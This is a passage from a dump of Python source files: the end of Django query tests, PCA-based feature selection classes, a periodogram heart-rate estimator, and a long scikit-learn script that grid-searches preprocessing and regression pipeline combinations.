self.assertEqual(result[0], 1)\n\n def test_subquery_annotation(self):\n query = Query(None)\n query.add_annotation(Exists(Item.objects.all()), \"_check\")\n result = query.get_compiler(using=DEFAULT_DB_ALIAS).execute_sql(SINGLE)\n self.assertEqual(result[0], 0)\n\n @skipUnlessDBFeature(\"supports_boolean_expr_in_select_clause\")\n def test_q_annotation(self):\n query = Query(None)\n check = ExpressionWrapper(\n Q(RawSQL(\"%s = 1\", (1,), BooleanField())) | Q(Exists(Item.objects.all())),\n BooleanField(),\n )\n query.add_annotation(check, \"_check\")\n result = query.get_compiler(using=DEFAULT_DB_ALIAS).execute_sql(SINGLE)\n self.assertEqual(result[0], 1)\n\n def test_names_to_path_field(self):\n query = Query(None)\n query.add_annotation(Value(True), \"value\")\n path, final_field, targets, names = query.names_to_path([\"value\"], opts=None)\n self.assertEqual(path, [])\n self.assertIsInstance(final_field, BooleanField)\n self.assertEqual(len(targets), 1)\n self.assertIsInstance(targets[0], BooleanField)\n self.assertEqual(names, [])\n\n def test_names_to_path_field_error(self):\n query = Query(None)\n msg = \"Cannot resolve keyword 'nonexistent' into field.\"\n with self.assertRaisesMessage(FieldError, msg):\n query.names_to_path([\"nonexistent\"], opts=None)\n\n def test_get_field_names_from_opts(self):\n self.assertEqual(get_field_names_from_opts(None), set())\n\n\nclass JoinPromoterTest(SimpleTestCase):\n def test_repr(self):\n self.assertEqual(\n repr(JoinPromoter(AND, 3, True)),\n \"JoinPromoter(connector='AND', num_children=3, negated=True)\",\n )\n","repo_name":"django/django","sub_path":"tests/queries/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"13732684853","text":"from sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom collections import defaultdict\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom sklearn.preprocessing import StandardScaler\nimport math\n\nclass PFA(object):\n def __init__(self, n_features, q=None):\n self.q = q\n self.n_features = n_features\n\n def fit(self, X):\n if not self.q:\n self.q = X.shape[1]\n\n sc = StandardScaler()\n X = sc.fit_transform(X)\n\n pca = PCA(n_components=self.q).fit(X)\n A_q = pca.components_.T\n\n kmeans = KMeans(n_clusters=self.n_features).fit(A_q)\n clusters = kmeans.predict(A_q)\n cluster_centers = kmeans.cluster_centers_\n\n dists = defaultdict(list)\n for i, c in enumerate(clusters):\n dist = euclidean_distances([A_q[i, :]], [cluster_centers[c, :]])[0][0]\n dists[c].append((i, dist))\n\n self.indices_ = [sorted(f, key=lambda x: x[1])[0][0] for f in dists.values()]\n self.features_ = X[:, self.indices_]\n\nclass PCAFeatures(object):\n def __init__(self, n_features, q=None):\n self.q = q\n self.n_features = n_features\n self.feature_scores = []\n\n def fit(self, X):\n if not self.q:\n self.q = X.shape[1]\n\n sc = StandardScaler()\n X = sc.fit_transform(X)\n\n pca = PCA(n_components=self.q)\n X_reduced = pca.fit(X)\n components = X_reduced.components_.T\n self.feature_scores = [0] * len(X_reduced.explained_variance_ratio_)\n for i in range(0, len(X_reduced.explained_variance_ratio_)):\n pc_variance = X_reduced.explained_variance_ratio_[i]\n component_columns = components[i]\n for j in range(0, len(component_columns)):\n pc_feature_score = math.fabs(pc_variance * component_columns[j])\n self.feature_scores[j] += pc_feature_score\n\n #\n # pca.fit(X)\n # X_proj = pca.transform(X)\n # components = pca.components_\n # X_rec = pca.inverse_transform(X_proj)\n # print()\n\n\n\n # self.indices_ = [sorted(f, key=lambda x: x[1])[0][0] for f in dists.values()]\n # self.features_ = X[:, self.indices_]","repo_name":"MWSanders/AssociationAbacMiner","sub_path":"src/experiment/PFA.py","file_name":"PFA.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"17101907317","text":"from scipy.signal import periodogram\nimport numpy as np\n\n# Фурье-анализ\ndef fourier_analysis(ppg_signal, fps):\n \n def find_idx_bigger(arr, thr):\n return next(f[0] for f in enumerate(arr) if f[1] > thr)\n \n MinFreq = 45 # bpm\n MaxFreq = 100 # bpm\n freqs, psd = periodogram(ppg_signal, fs=fps, window=None, detrend='constant', return_onesided=True, scaling='density')\n min_idx = find_idx_bigger(freqs, MinFreq/60.0) - 1\n max_idx = find_idx_bigger(freqs, MaxFreq/60.0) + 1\n hr_estimated = freqs[ min_idx + np.argmax(psd[min_idx : max_idx]) ]\n \n return hr_estimated","repo_name":"ArtemAvanesov/RPPG-BPM","sub_path":"second_stage/fourier_analysis.py","file_name":"fourier_analysis.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"22502439932","text":"import plotly.express as px\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score\nfrom numpy import mean\nfrom sklearn.compose import ColumnTransformer\nimport plotly\nfrom sklearn.base import clone\nimport itertools\nimport re \n# Encoder\nfrom sklearn.preprocessing import OneHotEncoder\n# Imputers\nfrom sklearn.impute import KNNImputer\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.experimental import enable_iterative_imputer\nfrom sklearn.impute import IterativeImputer\n# Outliers\nfrom sklearn.neighbors import LocalOutlierFactor\nfrom sklearn.ensemble import IsolationForest\n# Feature selectors\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis \nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import mutual_info_regression\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.feature_selection import mutual_info_classif\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.feature_selection import chi2\nfrom sklearn.feature_selection import f_regression\nfrom sklearn.feature_selection import r_regression\n# Scalers\nfrom sklearn.preprocessing import RobustScaler, MinMaxScaler, MaxAbsScaler\nfrom sklearn.preprocessing import StandardScaler\n# Estimators\nfrom sklearn.linear_model import LinearRegression, Ridge, TweedieRegressor, QuantileRegressor\nfrom sklearn.linear_model import Lasso, ElasticNet, BayesianRidge, ARDRegression\nfrom sklearn.linear_model import OrthogonalMatchingPursuit\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom xgboost import XGBRegressor\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.neural_network import MLPRegressor\n# Distribution\nfrom sklearn.preprocessing import QuantileTransformer\nfrom sklearn.preprocessing import PowerTransformer\nfrom sklearn.compose import ColumnTransformer, make_column_selector\n\n\"\"\" <-------------------------------- SET ---------------------------------> \"\"\"\n\ndf = pd.read_csv('train.csv')\ndf.drop(columns=['Id'],inplace=True)\nX_raw = df.drop(columns=['target']).copy()\ny_raw = df['target'].copy()\nnumerical_data = list(X_raw.columns)\ncategorical_data = []\nencoding_data = []\n\n# Split, es necesario cambiar el nombre de la columna objetivo a 'target'\n\nX_train, X_rem, y_train, y_rem = train_test_split(X_raw,y_raw, train_size=0.6,random_state=42)\nX_cv, X_test, y_cv, y_test = train_test_split(X_rem,y_rem, train_size=0.5,random_state=42)\n\nX = np.concatenate([X_train,X_cv])\nX = pd.DataFrame(X,columns=X_raw.columns)\ny = np.concatenate([y_train,y_cv])\ny = pd.DataFrame(y,columns=['target'])\n\n\"\"\" <----------------------------- FUNCTIONS ------------------------------> \"\"\"\n\ndef delete_nan(X,y,data):\n df_ = pd.concat([X,y],axis=1)\n df_ = df_.dropna(subset=data).reset_index(drop=True).copy() \n X, y = df_.drop(columns=['target']), pd.DataFrame(df_['target']) \n return X, y\n\ndef outlier_models(X,y,estimator,numerical_data):\n df = pd.concat([X,y],axis=1)\n\n if estimator == 'lof':\n lof = LocalOutlierFactor()\n X_bool_outliers = lof.fit_predict(df[numerical_data])\n\n elif estimator == 'ifo':\n ifo = IsolationForest()\n X_bool_outliers = ifo.fit_predict(df[numerical_data])\n\n mask = X_bool_outliers != -1\n X, y = df.drop(columns=['target']).iloc[mask,:], pd.DataFrame(df['target'][mask]) \n return X,y\n\ndef parameter_iterator(transformer,params):\n combination = []\n for t,k in enumerate(transformer):\n keys, values = zip(*params[t].items())\n permutations_dicts = [dict(zip(keys, v)) for v in itertools.product(*values)]\n for i in permutations_dicts:\n try:\n combination.append(clone(k.set_params(**i)))\n except:\n combination.append(k)\n \n return combination\n\ndef name_columns(transformer_names,transformer):\n columns_name = []\n for i in transformer.get_feature_names_out():\n for k in transformer_names:\n if k in i:\n name = i.replace(k,'')\n columns_name.append(name)\n return columns_name\n\ndef best_transformer(name,best_pipeline):\n for n,i in zip(best_pipeline[name].keys(),best_pipeline[name].values()):\n try:\n if i > j:\n best = n\n except:\n j=i\n best = n\n return best\n\ndef alpha_preprocessing(X,y,name_numerical_imputer,numerical_imputer,\n name_categorical_imputer,categorical_imputer,\n name_encoder, encoder,\n name_scaler,scaler,scaler_params,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,encoding_data,n_iterations,df=False):\n\n \"\"\" MISSING DATA AND ENCODIG\n Este algoritmo realiza la combinación de 2 imputadores (uno númerico y otro categorico),\n un codificador y \"n\" número de estimadores para determinar que combinación de los imputadores y\n el codificador da un mejor score para un estimador u otro. \n [ A / B of iteration C/D ] = A es la combinación en la cual va el algoritmo,\n B es el número de combinaciones totales,\n C es la iteración en la cual va\n D es el número de iteraciones totales\n Si el target posee valores perdidos agregarlo a la categoria correspondiente ya sea numerico o categoric,\n es decir categorical_data = ['target'] + categorical_data\n \"\"\"\n\n iteration = 1\n number_of_iterations = len(name_numerical_imputer)*len(name_categorical_imputer)*len(name_encoder)*len(name_estimator)*len(name_scaler)\n # len(name_outlier)*len(name_num_cat_feature)*len(name_numerical_feature)*\\\n # len(name_categorical_feature )*len(name_distribution)*len(name_scaler)*len(name_estimator)\n \n numerical_imputer_conter = []\n categorical_imputer_conter = []\n categorical_encoder_conter = []\n estimator_conter = []\n scaler_conter = []\n categorical_data_copy = categorical_data.copy()\n\n columns = ['Numerical_Imputer','Categorical_Imputer','Encoding','Scaler','Estimator','Score','Iteration']\n results = pd.DataFrame(columns=columns)\n while iteration <= n_iterations:\n \n conter=1\n score_ = []\n data = []\n for name_numerical_imputer_, numerical_imputer_ in \\\n zip(name_numerical_imputer,numerical_imputer):\n\n for name_categorical_imputer_, categorical_imputer_ in \\\n zip(name_categorical_imputer,categorical_imputer):\n\n for name_encoder_, encoder_ in zip(name_encoder, encoder): \n\n for name_scaler_, scaler_, scaler_params_ in zip(name_scaler,scaler,scaler_params):\n\n for name_estimator_, estimator_,estimator_params_ in zip(name_estimator,estimator,estimator_params): \n\n if name_numerical_imputer_ == 'passthrough' and name_categorical_imputer_ == 'passthrough':\n X_,y_ = delete_nan(X,y,categorical_data+numerical_data)\n\n elif name_numerical_imputer_ == 'passthrough':\n X_,y_ = delete_nan(X,y,numerical_data)\n \n elif name_categorical_imputer_ == 'passthrough':\n X_,y_ = delete_nan(X,y,categorical_data)\n\n else:\n X_,y_ = X,y\n \n # Preprocessor Imputer\n\n numerical_preprocessing = Pipeline([\n ('numerical_imputer', numerical_imputer_),\n ])\n\n categorical_preprocessing = Pipeline([\n ('categorical_imputer', categorical_imputer_),\n ])\n\n preprocessor = ColumnTransformer([\n ('numerical',numerical_preprocessing,numerical_data),\n ('categorical', categorical_preprocessing,categorical_data),\n ],verbose_feature_names_out=True,remainder='passthrough')\n\n X_ = preprocessor.fit_transform(X_)\n transformer = ['numerical__','categorical__','remainder__']\n columns_name = []\n for i in preprocessor.get_feature_names_out():\n for k in transformer:\n if k in i:\n name = i.replace(k,'')\n columns_name.append(name)\n\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n # Encoder\n encoding_preprocessing = Pipeline([\n ('encoding', encoder_)\n ])\n\n preprocessor_encoder = ColumnTransformer([\n ('encoder',encoding_preprocessing,encoding_data)\n ],verbose_feature_names_out=True,remainder='passthrough')\n \n X_ = preprocessor_encoder.fit_transform(X_)\n\n transformer = ['encoder__','remainder__']\n columns_name = []\n for i in preprocessor_encoder.get_feature_names_out():\n for k in transformer:\n if k in i:\n name = i.replace(k,'')\n columns_name.append(name)\n\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n params = {**estimator_params_,**scaler_params_}\n regression_pipe = Pipeline([\n ('scaler',scaler_),\n ('estimator',estimator_)\n ])\n\n regression_grid = GridSearchCV(regression_pipe,param_grid=params,scoring='r2',cv=5,n_jobs=1)\n regression_grid.fit(X_,y_.values.ravel())\n best_params = regression_grid.best_params_\n score_.append(regression_grid.best_score_)\n information = \"Numerical_Imputer: {0}; \"\\\n \"Catergorical_Imputer: {1}; \"\\\n \"Encoding: {2}; \"\\\n \"Scaler: {3}; \"\\\n \"Estimator: {4}; \"\\\n \"Score: {5}\".format(name_numerical_imputer_,\n name_categorical_imputer_,\n name_encoder_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_)\n data.append(information)\n #print(information + \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)+'\\n')\n if df == False:\n results.loc[len(results)] = [name_numerical_imputer_,\n name_categorical_imputer_,\n name_encoder_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_,\n \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)]\n results.to_csv('results_preprocess_1.csv',index=False)\n\n categorical_data = categorical_data_copy \n conter+=1\n idx = (-(np.array(score_))).argsort()[:5] # Select high score index\n for i in idx:\n numerical_imputer_conter.append(data[i].split('; ')[-6].split(': ')[1]) # Estimator conter\n categorical_imputer_conter.append(data[i].split('; ')[-5].split(': ')[1])\n categorical_encoder_conter.append(data[i].split('; ')[-4].split(': ')[1])\n scaler_conter.append(data[i].split('; ')[-3].split(': ')[1])\n estimator_conter.append(data[i].split('; ')[-2].split(': ')[1])\n iteration +=1\n\n best_pipeline = {}\n final_results = {}\n if df == False:\n with open('best_estimators_1.txt','w') as f:\n f.write('\\nNUMERICAL_IMPUTER\\n')\n for i in list(set(numerical_imputer_conter)):\n final_results[i]=numerical_imputer_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['NUMERICAL_IMPUTER']={**{i:final_results[i]},**best_pipeline['NUMERICAL_IMPUTER']}\n except:\n best_pipeline['NUMERICAL_IMPUTER']={i:final_results[i]}\n f.write('\\nCATEGORICAL_IMPUTER\\n')\n for i in list(set(categorical_imputer_conter)):\n final_results[i]=categorical_imputer_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['CATEGORICAL_IMPUTER']={**{i:final_results[i]},**best_pipeline['CATEGORICAL_IMPUTER']}\n except:\n best_pipeline['CATEGORICAL_IMPUTER']={i:final_results[i]}\n f.write('\\nCATEGORICAL_ENCODER\\n')\n for i in list(set(categorical_encoder_conter)):\n final_results[i]=categorical_encoder_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['CATEGORICAL_ENCODER']={**{i:final_results[i]},**best_pipeline['CATEGORICAL_ENCODER']}\n except:\n best_pipeline['CATEGORICAL_ENCODER']={i:final_results[i]}\n f.write('\\nSCALER\\n')\n for i in list(set(scaler_conter)):\n final_results[i]=scaler_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['SCALER']={**{i:final_results[i]},**best_pipeline['SCALER']}\n except:\n best_pipeline['SCALER']={i:final_results[i]}\n f.write('\\nESTIMATOR\\n')\n for i in list(set(estimator_conter)):\n final_results[i]=estimator_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n try:\n best_pipeline['ESTIMATOR']={**{i:final_results[i]},**best_pipeline['ESTIMATOR']}\n except:\n best_pipeline['ESTIMATOR']={i:final_results[i]} \n else:\n with open('parameter_for_preprocess_2.txt','w') as f:\n f.write('\\nNUMERICAL_IMPUTER\\n')\n for i in list(set(numerical_imputer_conter)):\n f.write((i)+'\\n')\n f.write('\\nCATEGORICAL_IMPUTER\\n')\n for i in list(set(categorical_imputer_conter)):\n f.write((i)+'\\n')\n f.write('\\nCATEGORICAL_ENCODER\\n')\n for i in list(set(categorical_encoder_conter)):\n f.write((i)+'\\n')\n\n if df == True:\n return X_,y\n return best_pipeline\n\ndef beta_preprocessing(X,y,name_outlier,outlier,\n name_num_cat_feature,num_cat_feature,\n name_numerical_feature,numerical_feature,\n name_categorical_feature,categorical_feature,\n name_distribution,distribution,\n name_scaler,scaler,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,n_iterations,return_best=False):\n\n \"\"\" MISSING DATA AND ENCODIG\n Este algoritmo realiza la combinación de 2 imputadores (uno númerico y otro categorico),\n un codificador y \"n\" número de estimadores para determinar que combinación de los imputadores y\n el codificador da un mejor score para un estimador u otro. \n [ A / B of iteration C/D ] = A es la combinación en la cual va el algoritmo,\n B es el número de combinaciones totales,\n C es la iteración en la cual va\n D es el número de iteraciones totales\n \"\"\"\n\n iteration = 1\n number_of_iterations = len(name_outlier)*len(name_num_cat_feature)*\\\n len(name_numerical_feature)*len(name_estimator)*len(name_scaler)*\\\n len(name_categorical_feature )*len(name_distribution)\n # len(name_outlier)*len(name_num_cat_feature)*len(name_numerical_feature)*\\\n # len(name_categorical_feature )*len(name_distribution)*len(name_scaler)*len(name_estimator)\n \n # For the file text \n distribution_conter = []\n outlier_conter = []\n num_cat_feature_conter = [] \n numerical_feature_conter = []\n categorical_feature_conter = []\n scaler_conter = []\n estimator_conter = []\n # Fin\n categorical_data_copy = categorical_data.copy()\n numerical_data_copy = numerical_data.copy()\n columns = ['Distribution','Outlier','Num_Cat_Feature','Numerical_Feature','Categorical_Feature','Scaler','estimator','Score','Iteration']\n results = pd.DataFrame(columns=columns)\n while iteration <= n_iterations:\n \n conter=1\n score_ = []\n data = []\n for name_outlier_,outlier_ in zip(name_outlier,outlier):\n\n for name_num_cat_feature_,num_cat_feature_ in zip(name_num_cat_feature,num_cat_feature):\n\n for name_numerical_feature_,numerical_feature_ in zip( name_numerical_feature,numerical_feature): \n\n for name_categorical_feature_,categorical_feature_ in zip(name_categorical_feature,categorical_feature):\n\n for name_distribution_,distribution_ in zip(name_distribution,distribution): \n\n for name_scaler_, scaler_ in zip(name_scaler,scaler):\n\n for name_estimator_, estimator_,estimator_params_ in \\\n zip(name_estimator,estimator,estimator_params): \n\n X_,y_ = X,y\n \n # Predict outliers\n\n if name_outlier_ != 'None':\n df = pd.concat([X_,y_],axis=1)\n X_bool_outliers = outlier_.fit_predict(df[numerical_data])\n mask = X_bool_outliers != -1\n X_, y_ = df.drop(columns=['target']).iloc[mask,:], pd.DataFrame(df['target'][mask])\n \n #print('Outlier',X_.shape)\n\n # Feature selection\n try:\n\n num_cat = ColumnTransformer([('num_cat_feature',num_cat_feature_,numerical_data+categorical_data)],remainder='passthrough',verbose_feature_names_out=True)\n\n X_ = num_cat.fit_transform(X_,y_)\n\n columns_name = name_columns(['num_cat_feature__','remainder__'],num_cat)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n #print('MUTUAL: ',X_.shape)\n\n num = ColumnTransformer([('numerical_feature', numerical_feature_,numerical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = num.fit_transform(X_,y_.values.ravel())\n\n columns_name = name_columns(['numerical_feature__','remainder__'],num)\n X_ = pd.DataFrame(X_,columns=columns_name)\n \n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n\n #print('PEARSON: ',X_.shape)\n cat = ColumnTransformer([('categorical_feature', categorical_feature_,categorical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = cat.fit_transform(X_,y_)\n\n columns_name = name_columns(['categorical_feature__','remainder__'],cat)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n\n #print('CHI2: ',X_.shape)\n \n except:\n conter+=1\n categorical_data = categorical_data_copy \n numerical_data = numerical_data_copy\n break\n\n dist = ColumnTransformer([('distribution', distribution_,numerical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = dist.fit_transform(X_,y_)\n\n columns_name = name_columns(['distribution__','remainder__'],dist)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n\n #print('DISTRIBUTION: ',X_.shape)\n\n sca = ColumnTransformer([('scaler',scaler_,numerical_data)],verbose_feature_names_out=True,remainder='passthrough')\n X_ = sca.fit_transform(X_)\n\n\n columns_name = name_columns(['scaler__','remainder__'],sca)\n X_ = pd.DataFrame(X_,columns=columns_name)\n\n categorical_data = [x for x in X_.columns if x not in numerical_data]\n numerical_data = [x for x in X_.columns if x not in categorical_data]\n #print('SCALER: ',X_.shape)\n\n regression_pipe = Pipeline([\n ('estimator',estimator_)\n ])\n \n regression_grid = GridSearchCV(regression_pipe,param_grid=estimator_params_,scoring='r2',cv=5,n_jobs=3)\n regression_grid.fit(X_,y_.values.ravel())\n best_params = regression_grid.best_params_\n score_.append(regression_grid.best_score_)\n information = \"Distribution: {0}; \"\\\n \"Outlier: {1}; \"\\\n \"Num_cat_feature: {2}; \"\\\n \"Numerical_feature: {3}; \"\\\n \"Categorical_feature: {4}; \"\\\n \"Scaler: {5}; \"\\\n \"Estimator: {6}; \"\\\n \"Score: {7}\".format(name_distribution_,\n name_outlier_,\n name_num_cat_feature_,\n name_numerical_feature_,\n name_categorical_feature_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_)\n data.append(information)\n #print(information + \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)+'\\n')\n results.loc[len(results)] = [name_distribution_,\n name_outlier_,\n name_num_cat_feature_,\n name_numerical_feature_,\n name_categorical_feature_,\n name_scaler_,\n name_estimator_,\n regression_grid.best_score_,\n \" [{0} / {1} of iteration {2}/{3}]\".format(conter,number_of_iterations,iteration,n_iterations)]\n results.to_csv('results_preprocess_2.csv',index=False)\n categorical_data = categorical_data_copy \n numerical_data = numerical_data_copy\n conter+=1\n #print(X_)\n \n idx = (-(np.array(score_))).argsort()[:5] # Select high score index\n for i in idx:\n distribution_conter.append(data[i].split('; ')[-8].split(': ')[1])\n outlier_conter.append(data[i].split('; ')[-7].split(': ')[1])\n num_cat_feature_conter.append(data[i].split('; ')[-6].split(': ')[1]) # Estimator conter\n numerical_feature_conter.append(data[i].split('; ')[-5].split(': ')[1])\n categorical_feature_conter.append(data[i].split('; ')[-4].split(': ')[1])\n scaler_conter.append(data[i].split('; ')[-3].split(': ')[1])\n estimator_conter.append(data[i].split('; ')[-2].split(': ')[1])\n iteration +=1\n\n final_results = {}\n with open('best_estimators_2.txt','w') as f:\n f.write('DISTRIBUTION\\n')\n for i in list(set(distribution_conter)):\n final_results[i]=distribution_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nOUTLIER\\n')\n for i in list(set(outlier_conter)):\n final_results[i]=outlier_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nNUM_CAT_FEATURE\\n')\n for i in list(set(num_cat_feature_conter)):\n final_results[i]=num_cat_feature_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nNUMERICAL_FEATURE\\n')\n for i in list(set(numerical_feature_conter)):\n final_results[i]=numerical_feature_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nCATEGORICAL_FEATURE\\n')\n for i in list(set(categorical_feature_conter)):\n final_results[i]=categorical_feature_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nSCALER\\n')\n for i in list(set(scaler_conter)):\n final_results[i]=scaler_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n f.write('\\nESTIMATOR\\n')\n for i in list(set(estimator_conter)):\n final_results[i]=estimator_conter.count(i)\n f.write(i+': '+str(final_results[i])+'\\n')\n if return_best == True:\n f.write('BEST PARAMS\\n')\n f.write(str(best_params))\n\n\"\"\" ------------------------ALPHA PREPROCESSING PARAMETERS------------------------ \"\"\"\n\n# <--------------------------------------------------------------------------> # \n# <-------------------------- NUMERICAL IMPUTER -----------------------------> #\n\nnumerical_imputer = ['passthrough',SimpleImputer(),KNNImputer(),IterativeImputer(random_state=0,max_iter=3000)]\n\nnumerical_imputer_params = [\n {'None':[None]}, # Delete Imputer\n {'strategy':['median','mean']},\n {'None':[None]},\n {'None':[None]} \n ]\n\n\nnumerical_imputer = parameter_iterator(numerical_imputer,numerical_imputer_params)\n\nname_numerical_imputer = [str(i) for i in numerical_imputer]\n\n# <-------------------------- CATEGORICAL IMPUTER ---------------------------> #\n\ncategorical_imputer = ['passthrough',SimpleImputer()]\n\ncategorical_imputer_params = [\n {'None':[None]}, # Delete-Imputer\n {'strategy':['most_frequent']}, # Simple-Imputer\n ]\n\n\ncategorical_imputer = parameter_iterator(categorical_imputer,categorical_imputer_params)\nname_categorical_imputer = [str(i) for i in categorical_imputer]\n\n# <---------------------------- ENCODER -------------------------------------> #\n\nencoder = [OneHotEncoder()]\n\nencoder_params = [\n {'None':[None]} # OneHotEncoder\n ]\n \n\nencoder = parameter_iterator(encoder,encoder_params)\n\nname_encoder = [str(i) for i in encoder]\n\n# <--------------------------------- SCALER ---------------------------------> #\n\nscaler = ['passthrough',RobustScaler(), MinMaxScaler(), MaxAbsScaler(),StandardScaler()]\n\nscaler_params = [\n {}, # None\n {}, # Robust\n {}, # MinMax\n {}, # MaxAbs\n {}, # StandardScaler\n ]\n\n\nname_scaler = [str(i) for i in scaler]\n\n# <------------------------------- PREDICTOR --------------------------------> #\n\nname_estimator = ['LinearRegression']\n\nestimator = [LinearRegression()]\n\nestimator_params = [\n {} # LogisticRegression\n ]\n\n# <--------------------------------------------------------------------------> #\n\n\"\"\" ------------------------ RUN PREPROCESSING ONE------------------------- \"\"\"\n\nbest_pipeline = alpha_preprocessing(X,y,name_numerical_imputer,numerical_imputer,\n name_categorical_imputer,categorical_imputer,\n name_encoder, encoder,\n name_scaler,scaler,scaler_params,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,encoding_data,20,df=False) \n\nnumerical_imputer_index = name_numerical_imputer.index(best_transformer('NUMERICAL_IMPUTER',best_pipeline))\n\ncategorical_imputer_index = name_categorical_imputer.index(best_transformer('CATEGORICAL_IMPUTER',best_pipeline))\n\nencoder_imputer_index = name_encoder.index(best_transformer('CATEGORICAL_ENCODER',best_pipeline))\n\n# Para el segundo alpha_preprocessing el df = True para que devuelva los dataframes,\n# el número de iteraciones igual a 1 porque no es necesario más\n\nX_preprocessed_1, y_preprocessed_1 = alpha_preprocessing(X,y,[name_numerical_imputer[numerical_imputer_index]],[numerical_imputer[numerical_imputer_index]],\n [name_categorical_imputer[categorical_imputer_index]],[categorical_imputer[categorical_imputer_index]],\n [name_encoder[encoder_imputer_index]], [encoder[encoder_imputer_index]],\n [name_scaler[0]],[scaler[0]],[scaler_params[0]],\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,encoding_data,1,df=True) \n\n# Para el 1 paso beta return_best = False para elegir lso mejores transformadoes y n_iterations debe ser alto para realizar varias\n# pruebas ya que los transformadores pueden ser estocasticos\n\ncategorical_data = list(X_preprocessed_1.columns[[i not in numerical_data for i in X_preprocessed_1.columns]])\n\n# <------------------------------- OUTLIER ----------------------------------> #\n\noutlier = [None,LocalOutlierFactor(),IsolationForest()]\n\noutlier_params = [\n {'None':[None]}, # None\n {'None':[None]}, # LOF\n {'None':[None]} # IFO\n ]\n\n\noutlier = parameter_iterator(outlier,outlier_params)\n\nname_outlier = [str(i) for i in outlier]\n\n# <----------------------- NUM CAT FEATURES / DIME RED ----------------------> #\n\nnum_cat_feature = ['passthrough',SelectKBest(score_func=mutual_info_regression),LinearDiscriminantAnalysis(),PCA()]\n\nnum_cat_feature_params = [\n {'None':[None]}, # None\n {'k':[i for i in range(1,len(X_preprocessed_1.columns)+1)]}, # KBest\n {'n_components':[i for i in range(1,len(X_preprocessed_1.columns)+1)]}, # LDA\n {'n_components':[i for i in range(1,len(X_preprocessed_1.columns)+1)]} # PCA\n ] \n\nnum_cat_feature = parameter_iterator(num_cat_feature,num_cat_feature_params)\n\nname_num_cat_feature = [str(i) for i in num_cat_feature]\n\n# <--------------------------- NUMERICAL FEATURES ---------------------------> #\n\nnumerical_feature = ['passthrough',SelectKBest(score_func=r_regression)]\n\nnumerical_feature_params = [\n {'None':[None]}, # None\n {'k':[i for i in range(1,len(numerical_data)+1)]}, # KBest\n ]\n\nnumerical_feature = parameter_iterator(numerical_feature,numerical_feature_params)\n\nname_numerical_feature = [str(i) for i in numerical_feature]\n\n# <-------------------------- CATEGORICAL FEATURES --------------------------> #\n\ncategorical_feature = ['passthrough',SelectKBest(score_func=chi2)]\n\ncategorical_feature_params = [\n {'None':[None]}, # None\n {'k':[i for i in range(1,len(categorical_data)+1)]}, # KBest\n ]\n\ncategorical_feature = parameter_iterator(categorical_feature,categorical_feature_params)\n\nname_categorical_feature = [str(i) for i in categorical_feature]\n\n# <--------------------------------- SCALER ---------------------------------> #\n\nscaler = ['passthrough',RobustScaler(), MinMaxScaler(), MaxAbsScaler(),StandardScaler()]\n\nscaler_params = 